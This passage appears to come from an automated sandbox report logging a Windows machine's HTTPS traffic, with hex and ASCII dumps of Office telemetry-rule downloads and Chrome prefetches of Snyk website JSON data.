                                                                                                                                                                                                                                                                                                              Data Ascii: pe":"table
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 2d 63 65 6c 6c 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 61 62 6c 65 2d 72 6f 77 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 68 61 63 6b 65 72 66 69 6c 65 6c 6f 6c 6c 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 61 62 6c 65 2d 63 65 6c 6c 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000-cell"}],"nodeType":"table-row"},{"data":{},"content":[{"data":{},"content":[{"data":{},"content":[{"data":{},"marks":[],"value":"hackerfileloll","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"table-cell"},{"data":{},"content":[{"data"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC12INData Raw: 22 3a 5b 5d 2c 22 63 6f 6e 63 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: ":[],"conc
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 70 46 6f 34 6a 44 53 42 30 44 6d 53 6c 56 72 79 6f 35 36 36 51 4c 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 30 39 2d 32 30 54 32 33 3a 32 31 3a 30 39 2e 31 38 39 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 37 2d 31 33 54 31 34 3a 33 39 3a 31 33 2e 30 33 30 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000epts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"pFo4jDSB0DmSlVryo566QL","type":"Entry","createdAt":"2022-09-20T23:21:09.189Z","updatedAt":"2023-07-13T14:39:13.030Z","environment":{"sys":{"id":"master
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC8204INData Raw: 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 63 6f 64 65 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 6e 6f 47 48 54 61 67 4c 61 73 74 56 65 72 73 69 6f 6e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 20 e2 80 93 20 4e 65 77 20 76 65 72 73 69 6f 6e 20 6f 66 20 61 20 70 61 63 6b 61 67 65 20 68 61 73 20 6e 6f 20 74 61 67 20 69 6e 20 61 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 47 69 74 48 75 62 20 72 65 70 6f 73 69 74 6f 72 79 20 28 61 6c 74 68 6f 75 67 68 2c 20 70 72 65 76 69 6f 75 73 20 76 65 72 73
                                                                                                                                                                                                                                                                                                              Data Ascii: :{},"content":[{"data":{},"content":[{"data":{},"marks":[{"type":"code"}],"value":"noGHTagLastVersion","nodeType":"text"},{"data":{},"marks":[],"value":" New version of a package has no tag in a corresponding GitHub repository (although, previous vers


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              136192.168.2.54990113.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:15 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: af8b8727-001e-00a2-18f5-24d4d5000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194915Z-15b8d89586fzhrwgk23ex2bvhw000000026g00000000ecdw
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              137192.168.2.54989713.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:15 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 759c8b5d-301e-003f-27f2-24266f000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194915Z-15b8d89586ff5l62aha9080wv000000000ug0000000034zn
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              138192.168.2.54989413.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:15 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 420
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: c4337264-b01e-0070-640b-221cc0000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194915Z-16849878b785g992cz2s9gk35c000000086000000000e8ne
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              139192.168.2.54989823.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC620OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/customers.json?slug=customers HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"bvayw9pumb13oh"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/customers.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::tx7k7-1729799355621-c6597e7010eb
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:15 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799355.1f6174c
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC15761INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 66 75 31 48 41 4c 52 34 72 36 30 45 37 47 6d 45 38 41 71 6b 62 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 33 2d 32 32 54 31 30 3a 30 36 3a 30 37 2e 33 38 35 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 38 2d 31 34 54 31
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"fu1HALR4r60E7GmE8Aqkb","type":"Entry","createdAt":"2024-03-22T10:06:07.385Z","updatedAt":"2024-08-14T1
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC15997INData Raw: 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 32 36 2c 22 72 65 76 69 73 69 6f 6e 22 3a 35 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 6d 6f 6c 65 63 75 6c 65 54 65 78 74 4d 65 64 69 61 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 5c 22 48 6f 77 20 53 6e 79 6b 20 68 65 6c 70 65 64 20 52 45 49 20 62 75 69 6c 64 20 61 20 44 65 76 53 65 63 4f 70 73 20 63 75 6c 74 75 72 65 5c 22
                                                                                                                                                                                                                                                                                                              Data Ascii: ype":"Link","linkType":"Environment"}},"publishedVersion":26,"revision":5,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"moleculeTextMedia"}},"locale":"en-US"},"fields":{"internalName":"\"How Snyk helped REI build a DevSecOps culture\"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC16384INData Raw: 37 45 74 69 4f 70 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4d 6f 6c 65 63 75 6c 65 4d 65 64 69 61 43 61 72 64 22 2c 22 69 6d 61 67 65 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 37 32 39 36 31 38 39 36 35 2f 64 65 66 61 75 6c 74 2d 72 65 70 6f 72 74 2e 62 32 30 35 62 32 65 30 2e 73 76 67 22 2c 22 74 61 67 73 22 3a 5b 5d 2c 22 74 79 70 65 22 3a 22 75 70 6c 6f 61 64 22 2c 22 62 79 74 65 73 22 3a 31 31 31 39 31 36 2c 22 77 69 64 74 68 22 3a 31 32 30 30 2c 22 66 6f 72 6d 61 74 22 3a 22 73 76 67 22 2c 22 68 65 69 67 68 74 22 3a 36 33 30 2c 22 76 65 72 73 69 6f 6e 22 3a
                                                                                                                                                                                                                                                                                                              Data Ascii: 7EtiOp","__typename":"Sys"},"__typename":"MoleculeMediaCard","image":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1729618965/default-report.b205b2e0.svg","tags":[],"type":"upload","bytes":111916,"width":1200,"format":"svg","height":630,"version":
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC1022INData Raw: 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 52 65 73 6f 75 72 63 65 20 6c 69 62 72 61 72 79 22 2c 22 75 72 6c 22 3a 22 2f 72 65 73 6f 75 72 63 65 2d 6c 69 62 72 61 72 79 2f 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 37 38 37 79 47 57 38 53 76 7a 45 7a 39 73 32 67 31 73 64 44 43 4c 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 42 6c 6f 67 22 2c 22 75 72 6c 22 3a 22 2f 62 6c 6f 67 2f 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 7a 63 42 4c 58 54 72 47 36 62 5a 57 76 75 51
                                                                                                                                                                                                                                                                                                              Data Ascii: :"Sys"},"__typename":"ContentNavigationItem","label":"Resource library","url":"/resource-library/"},{"sys":{"id":"787yGW8SvzEz9s2g1sdDCL","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Blog","url":"/blog/"},{"sys":{"id":"zcBLXTrG6bZWvuQ
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC2309INData Raw: 30 30 30 30 30 38 46 39 0d 0a 22 3a 22 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 73 6e 79 6b 2e 69 6f 2f 68 63 2f 65 6e 2d 75 73 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 55 45 42 61 33 45 79 4c 66 42 72 4f 52 78 43 34 39 6f 48 36 62 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 53 6e 79 6b 20 56 75 6c 6e 20 44 61 74 61 62 61 73 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 69 74 79 2e 73 6e 79 6b 2e 69 6f 2f 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 31 48 6f 6e 6a 4f 42 41 30 55 56 44 57 59 4c 68 74 4f 47 4e 6e 61 22 2c 22 5f 5f 74 79 70 65 6e 61 6d
                                                                                                                                                                                                                                                                                                              Data Ascii: 000008F9":"https://support.snyk.io/hc/en-us"},{"sys":{"id":"3UEBa3EyLfBrORxC49oH6b","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Snyk Vuln Database","url":"https://security.snyk.io/"},{"sys":{"id":"1HonjOBA0UVDWYLhtOGNna","__typenam
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              140192.168.2.54990223.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC618OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/partners.json?slug=partners HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC622INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"ym074irirg14py"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/partners.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::tx7k7-1729799355849-c1e088d57b80
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:15 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799355.1f61777
